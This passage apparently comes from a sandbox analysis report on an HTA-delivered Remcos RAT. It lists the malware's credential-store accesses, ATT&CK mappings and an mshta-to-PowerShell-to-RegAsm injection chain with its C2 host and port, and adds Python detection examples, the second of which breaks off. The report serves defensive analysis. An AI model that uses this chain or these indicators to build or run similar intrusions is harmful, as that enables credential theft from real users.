                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: 12_2_0041739B GetVersionExW,12_2_0041739B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match -- File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match -- File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match -- File source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara match -- File source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match -- File source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match -- File source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match -- File source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match -- File source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match -- File source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match -- File source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match -- File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                      Source: Yara match -- File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_0040BA4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Code function: \key3.db 11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Key opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword14_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword14_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword14_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
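The file and registry accesses listed above are what an injected RegAsm.exe running Remcos looks like from the endpoint: a .NET utility with no business near browser or mail profiles opening Login Data, key4.db, profiles.ini and the Outlook/Paltalk/Windows Live Mail account keys one after another. The Python below is an added example, not code from the report or from Joe Sandbox: it runs a detection over constructed Sysmon-style file/registry access events (field names, the PIDs other than 3092, and the store-owner allow-lists are assumptions) and flags both a non-owner process touching a credential store and any single process sweeping several stores, which catches harvesters even where the owner list is incomplete.

```python
"""Flag credential-store access by processes that do not own the store.

Added example, not part of the Joe Sandbox report.  Events are constructed
Sysmon-style file/registry accesses modelled on the report's findings; field
names and the owner allow-lists are assumptions for this example.
"""
import re
from collections import defaultdict

# Credential stores named in the report, each with the process that legitimately
# opens it.  Owner names are an assumption; tune them for your environment.
FILE_STORES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|Web Data)$", re.I), {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\Login Data$", re.I), {"msedge.exe"}),
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(key3\.db|key4\.db|places\.sqlite)$", re.I), {"firefox.exe"}),
    (re.compile(r"\\Mozilla\\Firefox\\profiles\.ini$", re.I), {"firefox.exe"}),
]
REG_STORES = [
    (re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", re.I), {"outlook.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles", re.I), {"outlook.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail", re.I), {"wlmail.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities", re.I), {"incmail.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts", re.I), {"googletalk.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\Software\\Paltalk", re.I), {"paltalk.exe"}),
]


def classify(event):
    """Return (store_id, owners) if the event touches a known credential store, else None."""
    table = FILE_STORES if event["type"] == "file" else REG_STORES
    for pattern, owners in table:
        if pattern.search(event["target"]):
            return pattern.pattern, owners
    return None


def find_credential_theft(events, min_stores=3):
    """Two independent signals:
    non_owner -- a process that is not the store's owner touched it;
    sweeps    -- one process touched at least `min_stores` distinct stores.
    """
    stores_by_proc = defaultdict(set)
    non_owner = []
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        store_id, owners = hit
        proc = ev["process"].lower()
        stores_by_proc[(ev["pid"], proc)].add(store_id)
        if proc not in owners:
            non_owner.append((ev["pid"], ev["process"], ev["target"]))
    sweeps = sorted(k for k, s in stores_by_proc.items() if len(s) >= min_stores)
    return non_owner, sweeps


# Constructed events: RegAsm.exe (PID 3092, as in the report) sweeping the stores,
# plus benign owner accesses that must not fire.  Paths follow the report's sandbox user.
EVENTS = [
    {"type": "file", "pid": 3092, "process": "RegAsm.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "pid": 3092, "process": "RegAsm.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"type": "file", "pid": 3092, "process": "RegAsm.exe", "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"type": "file", "pid": 3092, "process": "RegAsm.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db"},
    {"type": "file", "pid": 3092, "process": "RegAsm.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"type": "reg",  "pid": 3092, "process": "RegAsm.exe", "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"type": "reg",  "pid": 3092, "process": "RegAsm.exe", "target": r"HKEY_CURRENT_USER\Software\Paltalk"},
    {"type": "file", "pid": 3092, "process": "RegAsm.exe", "target": r"C:\Users\user\Documents\notes.txt"},  # not a store
    {"type": "file", "pid": 5012, "process": "chrome.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "pid": 6100, "process": "firefox.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db"},
    {"type": "reg",  "pid": 7020, "process": "OUTLOOK.EXE", "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
]

if __name__ == "__main__":
    hits, sweeps = find_credential_theft(EVENTS)
    for pid, proc, target in hits:
        print(f"non-owner access: {proc} (pid {pid}) -> {target}")
    for pid, proc in sweeps:
        print(f"credential sweep: {proc} (pid {pid})")
```

The sweep signal is the one worth keeping even after the owner lists have been tuned: a legitimate client opens its own store, while a stealer walks Chrome, Edge, Firefox and the mail clients in one pass, exactly the sequence of opens recorded above.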

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: cmd.exe (11_2_0040569A)
MITRE ATT&CK matrix (reconstructed from the flattened table: one line per tactic column, entries listed top to bottom; bracketed numbers are the signature-count badges as shown in the report, entries without a badge are the matrix's unmatched template cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting [111]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API [11]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [122]; Service Execution [2]; PowerShell [4]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting [111]; DLL Side-Loading [1]; Windows Service [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [1]; Access Token Manipulation [1]; Windows Service [1]; Process Injection [422]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Bypass User Account Control [1]; Masquerading [1]; Virtualization/Sandbox Evasion [21]; Access Token Manipulation [1]; Process Injection [422]; Dynamic API Resolution
Credential Access: OS Credential Dumping [2]; Input Capture [211]; Credentials in Registry [2]; Credentials In Files [3]; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [3]; System Information Discovery [39]; Security Software Discovery [31]; Virtualization/Sandbox Evasion [21]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [11]; Input Capture [211]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [21]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [213]; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Defacement [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID 1533059, sample na.hta, start date 14/10/2024, architecture WINDOWS, score 100), reconstructed from the flattened graph text. Numbers in parentheses after a process name are the graph's created-registry-values/created-files badges as extracted; the 497xx port values are the client's ephemeral ports, the last value in each list is the destination port.

Top level: contacted hosts idabo.duckdns.org, raw.githubusercontent.com, geoplugin.net
  signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures; Uses dynamic DNS services (idabo.duckdns.org)

mshta.exe (1)
  signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
  -> powershell.exe (3 39)
       network: 192.3.220.40 ports 49706, 49708 -> 80 (AS-COLOCROSSINGUS, United States)
       dropped: C:\...\seethebestpricewithgoodcookiesm.vbS (Unicode); C:\Users\user\AppData\...\p44lx5ym.cmdline (Unicode)
       signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found; 2 other signatures
       -> wscript.exe (1)
            signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
            -> powershell.exe (7)
                 signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found
                 -> powershell.exe (15 15)
                      network: raw.githubusercontent.com 185.199.111.133 port 49707 -> 443 (FASTLYUS, Netherlands)
                      signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                      -> RegAsm.exe
                           network: idabo.duckdns.org 135.148.195.248 ports 49714, 49722 -> 6875 (AVAYAUS, United States); geoplugin.net 178.237.33.50 port 49723 -> 80 (ATOM86-ASATOM86NL, Netherlands)
                           dropped: C:\ProgramData\remcos\logs.dat (data)
                           signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 8 other signatures
                           -> RegAsm.exe: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
                           -> RegAsm.exe: Tries to harvest and steal browser information (history, passwords, etc)
                           -> RegAsm.exe
                           -> RegAsm.exe
                 -> conhost.exe
       -> powershell.exe (21): Loading BitLocker PowerShell Module
       -> csc.exe (3)
            dropped: C:\Users\user\AppData\Local\...\p44lx5ym.dll (PE32)
            -> cvtres.exe (1)
       -> conhost.exe
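The Remote Access Functionality findings and the behavior graph together give the whole delivery chain: mshta.exe -> powershell.exe -> wscript.exe -> powershell.exe -> powershell.exe -> RegAsm.exe, with the final RegAsm.exe contacting idabo.duckdns.org on port 6875, looking itself up on geoplugin.net and creating the Rmc-I89M3S mutex. The Python below is an added example, not part of the report or of Joe Sandbox: it rebuilds process lineage from constructed process-creation, connection and mutex events (PIDs, field names, and the dynamic-DNS, raw-content and no-network-role lists are assumptions) and flags the parent-child edges, connections and mutex name that characterise this chain.

```python
"""Reconstruct the delivery chain from the behavior graph and flag its tell-tale edges.

Added example, not part of the Joe Sandbox report.  Process, connection and
mutex events are constructed to mirror the graph above; PIDs, field names and
the suffix/allow lists are assumptions.
"""
import ipaddress
import os

# Parent -> child edges that make sense only in a script-to-RAT delivery chain.
SUSPICIOUS_EDGES = {
    ("mshta.exe", "powershell.exe"),
    ("wscript.exe", "powershell.exe"),
    ("powershell.exe", "regasm.exe"),  # .NET utility used as an injection host
}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "mshta.exe", "cscript.exe"}
NO_NETWORK_ROLE = {"regasm.exe", "regsvcs.exe", "installutil.exe"}   # assumption
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.com", ".ddns.net")          # assumption
RAW_CONTENT_HOSTS = {"raw.githubusercontent.com", "pastebin.com"}       # assumption
REMCOS_MUTEX_PREFIX = "Rmc-"  # prefix of the mutex name seen in this report


def basename(image):
    return os.path.basename(image.replace("\\", "/")).lower()


def ancestry(procs, pid):
    """Image basenames from the root ancestor down to `pid` (cycle-safe)."""
    by_pid = {p["pid"]: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def chain_findings(procs):
    """One finding per process whose own parent edge is suspicious, with full lineage."""
    out = []
    for p in procs:
        chain = ancestry(procs, p["pid"])
        if len(chain) >= 2 and (chain[-2], chain[-1]) in SUSPICIOUS_EDGES:
            out.append((p["pid"], " -> ".join(chain)))
    return out


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def network_findings(conns, procs):
    image_of = {p["pid"]: basename(p["image"]) for p in procs}
    out = []
    for c in conns:
        image, host, port = image_of.get(c["pid"], "?"), c["dst_host"], c["dst_port"]
        reasons = []
        if image in NO_NETWORK_ROLE:
            reasons.append(f"{image} has no legitimate network role")
        if host.endswith(DYNDNS_SUFFIXES):
            reasons.append("dynamic-DNS destination")
        if port not in (80, 443):
            reasons.append(f"non-standard port {port}")
        if image in SCRIPT_HOSTS and (is_ip_literal(host) or host in RAW_CONTENT_HOSTS):
            reasons.append("script host fetching from bare IP or raw-content host")
        if reasons:
            out.append((c["pid"], image, f"{host}:{port}", reasons))
    return out


def mutex_findings(mutexes):
    return [(m["pid"], m["name"]) for m in mutexes
            if m["name"].rsplit("\\", 1)[-1].startswith(REMCOS_MUTEX_PREFIX)]


# Constructed events mirroring the behavior graph (PIDs are illustrative).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NET_FW = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
PROCS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe"},
    {"pid": 12,  "ppid": 100, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 15,  "ppid": 12,  "image": PS},
    {"pid": 20,  "ppid": 15,  "image": r"C:\Windows\System32\wscript.exe"},
    {"pid": 25,  "ppid": 15,  "image": NET_FW + r"\csc.exe"},
    {"pid": 30,  "ppid": 20,  "image": PS},
    {"pid": 35,  "ppid": 30,  "image": PS},
    {"pid": 41,  "ppid": 35,  "image": NET_FW + r"\RegAsm.exe"},
]
CONNS = [
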